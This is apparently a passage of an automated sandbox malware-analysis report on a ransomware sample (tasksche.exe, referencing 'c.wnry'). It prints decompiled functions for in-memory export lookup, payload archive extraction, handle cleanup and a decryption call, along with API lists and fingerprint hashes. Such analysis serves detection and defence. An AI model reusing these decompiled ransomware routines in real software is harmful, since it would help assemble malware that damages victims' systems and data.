                    • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                    • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

















                    0x00402928
                    0x0040292f
                    0x00402934
                    0x00402938
                    0x0040293e
                    0x004029a5
                    0x004029a7
                    0x004029ad
                    0x00402940
                    0x00402940
                    0x00402942
                    0x00402946
                    0x0040294a
                    0x00000000
                    0x00402951
                    0x00402951
                    0x0040295a
                    0x00402971
                    0x00402973
                    0x00402977
                    0x0040297a
                    0x00000000
                    0x0040297c
                    0x00402981
                    0x00402983
                    0x00402986
                    0x00402989
                    0x00402993
                    0x00000000
                    0x00000000
                    0x00402995
                    0x00402998
                    0x0040299f
                    0x004029a3
                    0x0040297e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004029a3
                    0x004029b4
                    0x004029b7
                    0x00000000
                    0x004029b7
                    0x0040295c
                    0x0040295c
                    0x0040295c
                    0x00402960
                    0x00402965
                    0x00000000
                    0x00402967
                    0x00402967
                    0x004029ba
                    0x004029bd
                    0x00000000
                    0x004029bf
                    0x004029c8
                    0x004029c8
                    0x004029bd
                    0x00402965
                    0x0040295a
                    0x0040294a
                    0x004029af
                    0x004029b3

                    APIs
                    • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                    • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_stricmp
                    • String ID: P!@
                    • API String ID: 1278613211-1774101457
                    • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                    • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}












                    0x00401dfe
                    0x00401e00
                    0x00401e05
                    0x00401e0e
                    0x00401e1a
                    0x00401e21
                    0x00401e2d
                    0x00401e32
                    0x00401e38
                    0x00401e3b
                    0x00401e3f
                    0x00401e41
                    0x00401e4a
                    0x00401e5b
                    0x00401e60
                    0x00401e65
                    0x00401e82
                    0x00401e87
                    0x00401e87
                    0x00401e8a
                    0x00401e8b
                    0x00401e41
                    0x00401e90
                    0x00401e96
                    0x00401e98
                    0x00401e07
                    0x00401e07
                    0x00401e9d

                    APIs
                    • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                    • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilestrcmp
                    • String ID: c.wnry
                    • API String ID: 3324900478-3240288721
                    • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                    • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                    0x00405ca0
                    0x00405ca6
                    0x00405cb1
                    0x00405cb6
                    0x00405cb6
                    0x00405cbc
                    0x00405cbd
                    0x00405cc6
                    0x00405ca8
                    0x00405cac
                    0x00405cac

                    APIs
                    • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                    • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??3@CloseHandle
                    • String ID: $l@
                    • API String ID: 3816424416-2140230165
                    • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                    • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                    Download Yara Rule
                    C-Code - Quality: 25%
                    			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}







                    0x004019e5
                    0x004019ec
                    0x00401a19
                    0x00000000
                    0x00401a19
                    0x004019ee
                    0x004019f2
                    0x00401a08
                    0x00401a10
                    0x00401a11
                    0x00401a1d
                    0x00401a2c
                    0x00401a3a
                    0x00401a3e
                    0x00000000
                    0x00401a3e
                    0x00401a13
                    0x00000000

                    APIs
                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                    • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$Leave$Entermemcpy
                    • String ID:
                    • API String ID: 3435569088-0
                    • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                    • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                    Uniqueness

                    Uniqueness Score: -1.00%